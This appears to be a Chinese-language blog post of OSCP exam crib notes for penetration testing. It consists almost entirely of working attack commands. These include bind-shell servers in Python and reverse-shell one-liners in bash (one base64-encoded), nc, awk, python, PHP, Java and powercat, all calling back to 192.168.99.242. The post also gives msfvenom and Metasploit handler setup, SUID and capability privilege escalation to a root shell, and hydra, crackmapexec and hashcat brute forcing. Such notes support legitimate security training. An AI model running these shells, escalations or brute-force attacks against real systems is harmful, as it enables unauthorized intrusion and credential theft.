oscp常用命令备忘

端口扫描

nmap -sV -v -A ip
nmap -sU ip #udp扫描,一般用不着,没思路了可以试试

正向shell

Linux

python

from socket import *
import subprocess
import os, threading, sys, time

if __name__ == "__main__":
        server=socket(AF_INET,SOCK_STREAM)
        server.bind(('0.0.0.0',11))
        server.listen(5)
        print 'waiting for connect'
        talk, addr = server.accept()
        print 'connect from',addr
        proc = subprocess.Popen(["/bin/sh","-i"], stdin=talk,
                stdout=talk, stderr=talk, shell=True)

msf

先生成正向shell的payload

msfvenom -p linux/x64/meterpreter/bind_tcp -a x64 --platform linux LPORT=4444 -f elf > bindtcp.elf

用蚁剑传上去,chmod +x,再运行。
kali这边再开始连接。

Windows

python

from socket import *
import subprocess
import os, threading

def send(talk, proc):
        import time
        while True:
                msg = proc.stdout.readline()
                talk.send(msg)

if __name__ == "__main__":
        server=socket(AF_INET,SOCK_STREAM)
        server.bind(('0.0.0.0',11))
        server.listen(5)
        print 'waiting for connect'
        talk, addr = server.accept()
        print 'connect from',addr
        proc = subprocess.Popen('cmd.exe /K', stdin=subprocess.PIPE, 
                stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
        t = threading.Thread(target = send, args = (talk, proc))
        t.setDaemon(True)
        t.start()
        while True:
                cmd=talk.recv(1024)
                proc.stdin.write(cmd)
                proc.stdin.flush()
        server.close()

msf

常用payload windows/x64/meterpreter_bind_tcp

反弹shell

参考链接

Linux

bash -i >& /dev/tcp/192.168.99.242/1234 0>&1
bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljk5LjI0Mi8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}'
# nc
nc -e /bin/bash 192.168.99.242 1234
#awk
awk 'BEGIN{s="/inet/tcp/0/192.168.99.242/1234";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'
#python
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.99.242',1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
#PHP
php -r '$sock=fsockopen("192.168.99.242",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Java版

public class Revs {
    /**
    * @param args
    * @throws Exception 
    */
public static void main(String[] args) throws Exception {
        // TODO Auto-generated method stub
        Runtime r = Runtime.getRuntime();
        String cmd[]= {"/bin/bash","-c","exec 5<>/dev/tcp/192.168.99.242/1234;cat <&5 | while read line; do $line 2>&5 >&5; done"};
        Process p = r.exec(cmd);
        p.waitFor();
    }
}

Windows

powercat

Import-Module ./powercat.ps1PS C:\WWW> powercat -c 192.168.99.242 -p 1234 -e cmd

msf

使用windows/x64/meterpreter_reverse_tcp

msf监听

看情况修改payload等各项参数。

查看所有payload方法

msfvenom --list payloads
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set rhost 192.168.40.129
set lport 4444
run

反弹shell升级

半交互式

python -c 'import pty; pty.spawn("/bin/bash")' 

全交互式

python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
stty raw -echo
fg
reset
export SHELL=bash

openssl生成加密shell

还没用到,先不记了

suid提权

寻找有suid权限的文件

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null

提权辅助网站
和上面类似的windows通过特权二进制提权的查询网址:链接
setsuid提权

getcap -r  / 2>/dev/null #查询被赋予CAP_SETUID权限的文件,来获取某些文件是否有利用的价值。目前得出可以利用用的几个

第一次执行时,不要重定向错误流,有可能导致问题被忽略
image
perl, python, tar

python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'

暴力破解

ssh

hydra -l <account> -P /usr/share/wordlists/rockyou.txt.gz ssh://10.10.10.233

子域名(vhost)

wfuzz -c -u "http://aaa.bbb/" -H "Host:FUZZ.aaa.bbb" -w /usr/share/amass/wordlists/subdomains-top1mil-5000.txt

先跑一次确认不存在的子域名的返回特征,再配合使用--hl等参数进行筛选。或者gobuster

gobuster vhost -u http://aaa.bbb -w Documents/SecLists-2021.3.1/Discovery/DNS/subdomains-top1million-110000.txt

爆破smb

crackmapexec smb ip -u user.txt -p "passwd"

hash爆破
判断hash类型
hashid
hash-identifier
hashcat hash实例

posted @ 2021-06-05 11:19  wuerror  阅读(53)  评论(0编辑  收藏  举报